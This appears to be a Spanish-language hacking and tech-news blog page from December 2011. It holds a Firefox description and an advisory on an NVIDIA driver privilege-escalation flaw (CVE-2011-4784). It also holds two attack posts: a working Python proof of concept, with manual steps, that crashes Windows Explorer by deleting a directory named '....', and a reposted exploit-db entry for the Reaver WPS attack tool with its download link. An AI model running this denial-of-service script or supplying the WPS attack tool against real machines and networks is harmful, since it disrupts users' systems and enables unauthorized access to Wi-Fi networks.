viernes, 30 de diciembre de 2011

Windows Explorer Denial Of Service (DOS)

# Windows 2008 SP2 RC2 Explorer Go Byebye :P
# Windows 7 Pro SP1 Explorer Go Byebye :P
# Interesting
# Brought to you by Level & z0r0 @ Smash The Stack

from win32com.shell import shell, shellcon
from os import mkdir

try:
mkdir("c:\\trigger_alt")
except:
print "[!] Trigger Directory Exists"
try:
mkdir("c:\\trigger_alt\\....")
except:
print "[!] Trigger Sub Directory Exists"

print "[!] Triggering Issue"

# This moves the directory containing the sub directory which creates the condition.
# The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:\trigger_alt
# 2- cd c:\trigger_alt
# 3- mkdir ....\
# 4- My Computer -> c:\trigger_alt
# 5- Right Click -> Delete

shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))

Reaver WiFi Protected Setup Exploit

# Exploit Title: Reaver WiFi Protected Setup Exploit
# Google Dork:
# Date: 28 December 2011
# Author: cheffner@tacnetsol.com
# Software Link: http://www.tacnetsol.com/products/
# Version: All 802.11 access points implementing WiFi Protected Setup and have it enabled.
# Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others
# CVE : No CVE US-CERT VU#723755

http://www.exploit-db.com/sploits/reaver-1.1.tar.gz

viernes, 23 de diciembre de 2011

Firefox 9.0.1


Mozilla Firefox es un navegador web que logró hacerse un hueco cuando el mercado estaba ocupado totalmente por Internet Explorer. Su secreto: potencia y versatilidad, ganadas a través de años de desarrollo, y un enorme catálogo de extensiones para aumentar sus posibilidades hasta el infinito.

Si por algo se ha caracterizado Mozilla Firefox es por introducir progresivamente nuevas mejoras que hacen el programa más vistoso y fácil de usar.

Si bien Firefox no introdujo la navegación por pestañas, sí que ha sido el programa que acabó popularizando este sistema tan extendido. Ahora, en sus últimas versiones, las ha colocado en la barra, de forma más accesible, y ha introducido Panorama: un gestor visual que las organiza por grupos.

Además de las mejoras de usabilidad, Mozilla Firefox también trae consigo funciones puramente estéticas. Es el caso de Personas, una colección de temas o skins con los que darás un aspecto único a tu navegador. Estas pieles se previsualizan directamente para que no tengas que instalarlas y sepas como quedan.

Pero no todo es apariencia entre las virtudes de Firefox. Si algo le ha hecho ganarse el favor de los usuarios es su compatibilidad con estándares. HTML5 y CSS3 son soportados casi por completo, así como los habituales mediante plug-ins, como Java y Flash.

En Mozilla Firefox son constantes las mejoras en los motores de renderizado (Gecko) y Javascript (Jägermonkey) que aligeran el programa para convertirlo en uno de los más rápidos en cargar páginas con tecnología reciente.

¿Ampliable hasta el infinito?

Otro apartado que otorga una personalización única son las extensiones, complementos o plug-ins que se instalan para dotar de funciones nuevas a tu Firefox. Gracias a ellas, tendrás un navegador hecho a medida, consumiendo los recursos justos para tus necesidades. He aquí unos ejemplos de extensiones imprescindibles:

- Adblock Plus: bloquea anuncios de las webs
- DownThemAll: descarga múltiples ficheros a la vez
- Video DownloadHelper: baja vídeos de cualquier página
- Stylish: cambia el aspecto de un sitio web
- Greasemonkey: aplica scripts para infinidad de funciones
- Picnik: un editor gráfico al estilo de Photoshop

Descargar

Elevación de privilegios a través de drivers de NVIDIA 3D




Jeong Wook Oh, un investigador de Microsoft Malware Protection Center (MMPC) ha descubierto una vulnerabilidad en los controladores NVIDIA Stereoscopic 3D (versiones 7.17.12.7536 y anteriores).

Estos drivers permiten acceder a contenido 3D con tarjetas gráficas y monitores compatibles, para proporcionar una experiencia 3D en ordenadores con estas características.

El fallo, con CVE-2011-4784, se produce al no filtrar adecuadamente los comandos recibidos. Un atacante local podría aprovechar esto para enviar comandos especialmente diseñados que se ejecutarían con permisos del sistema.

Recomendamos descargar la última versión de los controladores, que solucionan este error, desde: http://www.nvidia.com/Download/index.aspx

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)